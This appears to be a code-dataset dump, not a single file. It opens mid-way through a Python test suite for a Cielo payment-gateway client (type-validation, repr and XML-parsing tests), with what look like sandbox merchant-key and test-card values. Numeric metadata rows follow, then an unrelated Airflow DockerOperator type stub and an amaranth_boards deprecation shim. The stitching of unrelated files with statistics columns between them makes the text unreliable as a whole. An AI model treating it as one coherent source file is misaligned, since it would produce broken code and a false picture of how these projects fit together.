codigo=1, mensagem='msg', data_hora=201112,
valor=10000, eci=7
)
assert 'data_hora precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autenticacao(
codigo=1, mensagem='msg', data_hora='2011-12-07T11:43:37',
valor='10000', eci=7
)
assert 'valor precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autenticacao(
codigo=1, mensagem='msg', data_hora='2011-12-07T11:43:37',
valor=10000, eci='7'
)
assert 'eci precisa ser do tipo inteiro.' in str(excinfo.value)
def test_repr(self):
autenticacao = Autenticacao(
codigo=6, mensagem='Transacao sem autenticacao',
data_hora='2016-03-05T00:03:46.158-03:00', valor=10000, eci=7
)
self.assertEqual(
repr(autenticacao),
'<Autenticacao(codigo=6, mensagem=Transacao sem autenticacao, data_hora=2016-03-05T00:03:46.158-03:00, valor=10000, eci=7)>'
)
class TestAutorizacao(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Autorizacao(
codigo='1', mensagem='msg', data_hora='2011-12-07T11:43:37',
valor=10000, lr="01", arp=1, nsu=1
)
assert 'codigo precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autorizacao(
codigo=1, mensagem=1, data_hora='2011-12-07T11:43:37',
valor=10000, lr="01", arp=1, nsu=1
)
assert 'mensagem precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autorizacao(
codigo=1, mensagem='msg', data_hora=201112,
valor=10000, lr="01", arp=1, nsu=1
)
assert 'data_hora precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autorizacao(
codigo=1, mensagem='msg', data_hora='2011-12-07T11:43:37',
valor='10000', lr="01", arp=1, nsu=1
)
assert 'valor precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autorizacao(
codigo=1, mensagem='msg', data_hora='2011-12-07T11:43:37',
valor=10000, lr=1, arp=1, nsu=1
)
assert 'lr precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autorizacao(
codigo=1, mensagem='msg', data_hora='2011-12-07T11:43:37',
valor=10000, lr="01", arp='1', nsu=1
)
assert 'arp precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autorizacao(
codigo=1, mensagem='msg', data_hora='2011-12-07T11:43:37',
valor=10000, lr="01", arp=1, nsu='1'
)
assert 'nsu precisa ser do tipo inteiro.' in str(excinfo.value)
def test_repr(self):
autorizacao = Autorizacao(
codigo=6, mensagem='Transacao autorizada',
data_hora='2016-03-05T00:03:46.161-03:00', valor=10000, lr="00",
arp=123456, nsu=36318
)
self.assertEqual(
repr(autorizacao),
'<Autorizacao(codigo=6, mensagem=Transacao autorizada, data_hora=2016-03-05T00:03:46.161-03:00, valor=10000, lr=00, arp=123456, nsu=36318)>'
)
class TestToken(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Token(codigo=1, status=1, numero='1234')
assert 'codigo precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Token(codigo='code', status='1', numero='1234')
assert 'status precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Token(codigo='code', status=1, numero=1234)
assert 'numero precisa ser do tipo string.' in str(excinfo.value)
def test_repr(self):
token = Token(codigo='code', status=1, numero='1234')
self.assertEqual(
repr(token),
'<Token(codigo=code, status=1, numero=1234)>'
)
class TestAvs(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Avs(
endereco=1, complemento='', numero=1, bairro='Bairro',
cep='00000-000'
)
assert 'endereco precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Avs(
endereco='Rua 1', complemento=1, numero=1, bairro='Bairro',
cep='00000-000'
)
assert 'complemento precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Avs(
endereco='Rua 1', complemento='', numero='1', bairro='Bairro',
cep='00000-000'
)
assert 'numero precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Avs(
endereco='Rua 1', complemento='', numero=1, bairro=1,
cep='00000-000'
)
assert 'bairro precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Avs(
endereco='Rua 1', complemento='', numero=1, bairro='Bairro',
cep=0
)
assert 'cep precisa ser do tipo string.' in str(excinfo.value)
def test_repr(self):
avs = Avs(
endereco='Rua 1', complemento='', numero=1, bairro='Bairro',
cep='00000000'
)
self.assertEqual(
repr(avs),
'<Avs(endereco=Rua 1, complemento=, numero=1, bairro=Bairro, cep=00000000)>'
)
class TestCaptura(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Captura(
codigo='1', mensagem='mensagem',
data_hora='2011-12-07T11:43:37', valor=10000, taxa_embarque=0
)
assert 'codigo precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Captura(
codigo=1, mensagem=1, data_hora='2011-12-07T11:43:37',
valor=10000, taxa_embarque=0
)
assert 'mensagem precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Captura(
codigo=1, mensagem='mensagem', data_hora=1,
valor=10000, taxa_embarque=0
)
assert 'data_hora precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Captura(
codigo=1, mensagem='mensagem', data_hora='2011-12-07T11:43:37',
valor='10000', taxa_embarque=0
)
assert 'valor precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Captura(
codigo=1, mensagem='mensagem', data_hora='2011-12-07T11:43:37',
valor=10000, taxa_embarque='0'
)
assert 'taxa_embarque precisa ser do tipo inteiro.' in str(excinfo.value)
def test_repr(self):
captura = Captura(
codigo=1, mensagem='mensagem', data_hora='2011-12-07T11:43:37',
valor=10000, taxa_embarque=0
)
self.assertEqual(
repr(captura),
'<Captura(codigo=1, mensagem=mensagem, data_hora=2011-12-07T11:43:37, valor=10000, taxa_embarque=0)>'
)
class TestCancelamento(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Cancelamento(
codigo='1', mensagem='mensagem',
data_hora='2011-12-07T11:43:37', valor=10000,
)
assert 'codigo precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Cancelamento(
codigo=1, mensagem=1, data_hora='2011-12-07T11:43:37',
valor=10000,
)
assert 'mensagem precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Cancelamento(
codigo=1, mensagem='mensagem', data_hora=201112, valor=10000
)
assert 'data_hora precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Cancelamento(
codigo=1, mensagem='mensagem',
data_hora='2011-12-07T11:43:37', valor='10000',
)
assert 'valor precisa ser do tipo inteiro.' in str(excinfo.value)
def test_repr(self):
cancelamento = Cancelamento(
codigo=1, mensagem='mensagem', data_hora='2011-12-07T11:43:37',
valor=10000
)
self.assertEqual(
repr(cancelamento),
'<Cancelamento(codigo=1, mensagem=mensagem, data_hora=2011-12-07T11:43:37, valor=10000)>'
)
class TestErro(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Erro(codigo=1, mensagem='mensagem')
assert 'codigo precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Erro(codigo='001', mensagem=1)
assert 'mensagem precisa ser do tipo string.' in str(excinfo.value)
def test_repr(self):
erro = Erro(codigo='001', mensagem='erro')
self.assertEqual(
repr(erro),
'<Erro(codigo=001, mensagem=erro)>'
)
class TestTransacao(TestCase):
def test_validate(self):
comercial = Comercial(numero=1234, chave='1234')
cartao = Cartao(
numero=1234, validade=201805, indicador=1,
codigo_seguranca=123, nome_portador='Fulano Silva'
)
pedido = Pedido(
numero='1234', valor=10000, moeda=986,
data_hora='2011-12-07T11:43:37',
)
pagamento = Pagamento(bandeira='visa', produto='1', parcelas=1)
autenticacao = Autenticacao(
codigo=1, mensagem='msg', data_hora='2011-12-07T11:43:37',
valor=10000, eci=7
)
autorizacao = Autorizacao(
codigo=1, mensagem='msg', data_hora='2011-12-07T11:43:37',
valor=10000, lr="01", arp=1, nsu=1
)
token = Token(codigo='codigo', status=1, numero='1234')
avs = Avs(
endereco='Rua 1', complemento='', numero=1, bairro='Bairro',
cep='00000-000'
)
captura = Captura(
codigo=1, mensagem='mensagem',
data_hora='2011-12-07T11:43:37', valor=10000, taxa_embarque=0
)
cancelamento = Cancelamento(
codigo=1, mensagem='mensagem', data_hora='2011-12-07T11:43:37',
valor=10000,
)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=1, cartao=cartao, pedido=pedido,
pagamento=pagamento,
)
assert 'comercial precisa ser do tipo Comercial.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=1, pedido=pedido,
pagamento=pagamento,
)
assert 'cartao precisa ser do tipo Cartao.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=1,
pagamento=pagamento,
)
assert 'pedido precisa ser do tipo Pedido.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=1,
)
assert 'pagamento precisa ser do tipo Pagamento.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, autorizar='1'
)
assert 'autorizar precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, autorizar=1, url_retorno=1
)
assert 'url_retorno precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, capturar='false'
)
assert 'capturar precisa ser do tipo booleano.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, campo_livre=1
)
assert 'campo_livre precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, bin='1234'
)
assert 'bin precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, gerar_token='false', avs=avs
)
assert 'gerar_token precisa ser do tipo booleano.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, avs=1
)
assert 'avs precisa ser do tipo Avs.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, autenticacao=1, autorizacao=autorizacao
)
assert 'autenticacao precisa ser do tipo Autenticacao.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, autenticacao=autenticacao, autorizacao=1,
captura=captura
)
assert 'autorizacao precisa ser do tipo Autorizacao.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, autenticacao=autenticacao,
autorizacao=autorizacao, captura=1
)
assert 'captura precisa ser do tipo Captura.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, tid=1, pan='pan', status=1
)
assert 'tid precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, tid='1', pan=1, status=1
)
assert 'pan precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, tid='1', pan='pan', status='1',
url_autenticacao='http://google.com'
)
assert 'status precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, tid='1', pan='pan', status=1,
url_autenticacao=1, token=token
)
assert 'url_autenticacao precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, tid='1', pan='pan', status=1, token=1,
cancelamento=cancelamento
)
assert 'token precisa ser do tipo Token.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, tid='1', pan='pan', status=1,
cancelamento=1
)
assert 'cancelamento precisa ser do tipo Cancelamento.' in str(excinfo.value)
def test_repr(self):
comercial = Comercial(
numero=1006993069, chave='25fbb99741c739dd84d7b06ec78c9bac718838630f30b112d033ce2e621b34f3'
)
cartao = Cartao(
numero=4012001037141112, validade=201805, indicador=1,
codigo_seguranca=123, nome_portador='Fulano Silva'
)
pedido = Pedido(
numero='1234', valor=10000, moeda=986,
data_hora='2016-03-05T05:01:30.738727'
)
pagamento = Pagamento(bandeira='visa', produto='1', parcelas=1)
transacao = Transacao(
comercial=comercial, cartao=cartao, pedido=pedido,
pagamento=pagamento, autorizar=3, capturar=True
)
self.assertEqual(
repr(transacao),
'<Transacao(comercial=<Comercial(numero=1006993069, chave=25fbb99741c739dd84d7b06ec78c9bac718838630f30b112d033ce2e621b34f3)>, cartao=<Cartao(numero=4012001037141112, validade=201805, indicador=1, codigo_seguranca=123, nome_portador=Fulano Silva, token=None)>, pedido=<Pedido(numero=1234, valor=10000, moeda=986, data_hora=2016-03-05T05:01:30.738727, descricao=None, idioma=PT, taxa_embarque=None, soft_descriptor=None)>, pagamento=<Pagamento(bandeira=visa, produto=1, parcelas=1)>, url_retorno=None, autorizar=3, capturar=True, campo_livre=None, bin=None, gerar_token=None, avs=None, autenticacao=None, autorizacao=None, captura=None, token=None, cancelamento=None, tid=None, pan=None, status=None, url_autenticacao=None)>'
)
class TestXmlToObject(TestCase):
def test_autorizacao_direta(self):
transacao = xml_to_object(
open(os.path.join(BASE_DIR, 'xml1.xml')).read()
)
self.assertEqual(transacao.tid, '100699306948372E1001')
self.assertEqual(
transacao.pan, 'IqVz7P9zaIgTYdU41HaW/OB/d7Idwttqwb2vaTt8MT0='
)
self.assertEqual(transacao.status, 6)
self.assertTrue(isinstance(transacao.pedido, Pedido))
self.assertTrue(isinstance(transacao.pagamento, Pagamento))
self.assertTrue(isinstance(transacao.autenticacao, Autenticacao))
self.assertTrue(isinstance(transacao.autorizacao, Autorizacao))
self.assertTrue(isinstance(transacao.captura, Captura))
def test_autorizacao_direta_com_gerar_token(self):
transacao = xml_to_object(
open(os.path.join(BASE_DIR, 'xml3.xml')).read()
)
self.assertEqual(transacao.tid, '10069930694847D91001')
self.assertEqual(
transacao.pan, 'IqVz7P9zaIgTYdU41HaW/OB/d7Idwttqwb2vaTt8MT0='
)
self.assertEqual(transacao.status, 6)
self.assertTrue(isinstance(transacao.pedido, Pedido))
self.assertTrue(isinstance(transacao.pagamento, Pagamento))
self.assertTrue(isinstance(transacao.autenticacao, Autenticacao))
self.assertTrue(isinstance(transacao.autorizacao, Autorizacao))
self.assertTrue(isinstance(transacao.captura, Captura))
self.assertTrue(isinstance(transacao.token, Token))
def test_transacao_autenticada(self):
transacao = xml_to_object(
open(os.path.join(BASE_DIR, 'xml2.xml')).read()
)
self.assertTrue(isinstance(transacao, Transacao))
self.assertEqual(transacao.tid, '1006993069483CE61001')
self.assertEqual(
transacao.pan, 'IqVz7P9zaIgTYdU41HaW/OB/d7Idwttqwb2vaTt8MT0='
)
self.assertEqual(transacao.status, 0)
self.assertEqual(
transacao.url_autenticacao,
'https://qasecommerce.cielo.com.br/web/index.cbmp?id=5a3a7c089f5299f535dcdd1f502a38ba'
)
self.assertTrue(isinstance(transacao.pedido, Pedido))
self.assertTrue(isinstance(transacao.pagamento, Pagamento))
self.assertFalse(transacao.autenticacao)
self.assertFalse(transacao.autorizacao)
self.assertFalse(transacao.captura)
def test_token(self):
token = xml_to_object(
open(os.path.join(BASE_DIR, 'xml4.xml')).read()
)
self.assertTrue(isinstance(token, Token))
self.assertEqual(
token.codigo, 'HYcQ0MQ39fl8kn9OR7lFsTtxa+wNuM4lqQLUeN5SYZY='
)
self.assertEqual(token.status, 1)
self.assertEqual(token.numero, '211141******2104')
def test_cancelamento(self):
transacao = xml_to_object(
open(os.path.join(BASE_DIR, 'xml7.xml')).read()
)
self.assertTrue(isinstance(transacao, Transacao))
self.assertEqual(transacao.tid, '1006993069484E8B1001')
self.assertEqual(
transacao.pan, 'IqVz7P9zaIgTYdU41HaW/OB/d7Idwttqwb2vaTt8MT0='
)
self.assertTrue(isinstance(transacao.cancelamento, Cancelamento))
self.assertEqual(transacao.cancelamento.codigo, 9)
self.assertEqual(
transacao.cancelamento.mensagem, 'Transacao cancelada com sucesso'
)
self.assertEqual(
transacao.cancelamento.data_hora, '2015-10-06T16:45:10.547-03:00'
)
self.assertEqual(transacao.cancelamento.valor, 10000)
def test_erro(self):
erro = xml_to_object(
open(os.path.join(BASE_DIR, 'xml8.xml')).read()
)
self.assertTrue(isinstance(erro, Erro))
self.assertEqual(erro.codigo, '000')
self.assertEqual(erro.mensagem, 'Mensagem')
| 38.981865
| 735
| 0.601017
| 3,313
| 30,094
| 5.407486
| 0.062783
| 0.039073
| 0.062517
| 0.097684
| 0.834887
| 0.819369
| 0.800837
| 0.800837
| 0.771365
| 0.765336
| 0
| 0.088468
| 0.29348
| 30,094
| 771
| 736
| 39.032425
| 0.754115
| 0.000698
| 0
| 0.52454
| 0
| 0.01227
| 0.207808
| 0.041934
| 0
| 0
| 0
| 0
| 0.190184
| 1
| 0.046012
| false
| 0
| 0.007669
| 0
| 0.07362
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fa7c10bc5d6f494fe9c49d2811d058097ea2e923
| 1,573
|
py
|
Python
|
src/airfly/_vendor/airflow/providers/docker/operators/docker.py
|
ryanchao2012/airfly
|
230ddd88885defc67485fa0c51f66c4a67ae98a9
|
[
"MIT"
] | 7
|
2021-09-27T11:38:48.000Z
|
2022-02-01T06:06:24.000Z
|
src/airfly/_vendor/airflow/providers/docker/operators/docker.py
|
ryanchao2012/airfly
|
230ddd88885defc67485fa0c51f66c4a67ae98a9
|
[
"MIT"
] | null | null | null |
src/airfly/_vendor/airflow/providers/docker/operators/docker.py
|
ryanchao2012/airfly
|
230ddd88885defc67485fa0c51f66c4a67ae98a9
|
[
"MIT"
] | null | null | null |
# Auto generated by 'inv collect-airflow'
from airfly._vendor.airflow.models.baseoperator import BaseOperator
class DockerOperator(BaseOperator):
image: "str"
api_version: "typing.Union[str, NoneType]"
command: "typing.Union[str, typing.List[str], NoneType]"
container_name: "typing.Union[str, NoneType]"
cpus: "float"
docker_url: "str"
environment: "typing.Union[typing.Dict, NoneType]"
private_environment: "typing.Union[typing.Dict, NoneType]"
force_pull: "bool"
mem_limit: "typing.Union[float, str, NoneType]"
host_tmp_dir: "typing.Union[str, NoneType]"
network_mode: "typing.Union[str, NoneType]"
tls_ca_cert: "typing.Union[str, NoneType]"
tls_client_cert: "typing.Union[str, NoneType]"
tls_client_key: "typing.Union[str, NoneType]"
tls_hostname: "typing.Union[str, bool, NoneType]"
tls_ssl_version: "typing.Union[str, NoneType]"
tmp_dir: "str"
user: "typing.Union[str, int, NoneType]"
mounts: "typing.Union[typing.List[docker.types.services.Mount], NoneType]"
entrypoint: "typing.Union[str, typing.List[str], NoneType]"
working_dir: "typing.Union[str, NoneType]"
xcom_all: "bool"
docker_conn_id: "typing.Union[str, NoneType]"
dns: "typing.Union[typing.List[str], NoneType]"
dns_search: "typing.Union[typing.List[str], NoneType]"
auto_remove: "bool"
shm_size: "typing.Union[int, NoneType]"
tty: "bool"
privileged: "bool"
cap_add: "typing.Union[typing.Iterable[str], NoneType]"
extra_hosts: "typing.Union[typing.Dict[str, str], NoneType]"
| 41.394737
| 78
| 0.703751
| 203
| 1,573
| 5.310345
| 0.359606
| 0.234694
| 0.181818
| 0.204082
| 0.410019
| 0.263451
| 0.12987
| 0
| 0
| 0
| 0
| 0
| 0.149396
| 1,573
| 37
| 79
| 42.513514
| 0.80568
| 0.024793
| 0
| 0
| 1
| 0
| 0.537206
| 0.148172
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.029412
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
faafee2feb447496abcc1d1003281ec52dad7439
| 254
|
py
|
Python
|
nmigen_boards/qmtech_10cl006.py
|
hansfbaier/amaranth-boards
|
a3e92db69e74cc18a42808f6f72068f05efe018e
|
[
"BSD-2-Clause"
] | 1
|
2022-01-22T20:23:07.000Z
|
2022-01-22T20:23:07.000Z
|
nmigen_boards/qmtech_10cl006.py
|
amaranth-community-unofficial/amaranth-boards
|
eacb18700d0ed97f525737ca80d923ebd5851505
|
[
"BSD-2-Clause"
] | null | null | null |
nmigen_boards/qmtech_10cl006.py
|
amaranth-community-unofficial/amaranth-boards
|
eacb18700d0ed97f525737ca80d923ebd5851505
|
[
"BSD-2-Clause"
] | null | null | null |
from amaranth_boards.qmtech_10cl006 import *
from amaranth_boards.qmtech_10cl006 import __all__
import warnings
warnings.warn("instead of nmigen_boards.qmtech_10cl006, use amaranth_boards.qmtech_10cl006",
DeprecationWarning, stacklevel=2)
| 36.285714
| 92
| 0.818898
| 31
| 254
| 6.322581
| 0.516129
| 0.244898
| 0.387755
| 0.413265
| 0.377551
| 0.377551
| 0
| 0
| 0
| 0
| 0
| 0.094595
| 0.125984
| 254
| 7
| 93
| 36.285714
| 0.788288
| 0
| 0
| 0
| 0
| 0
| 0.294118
| 0.231373
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|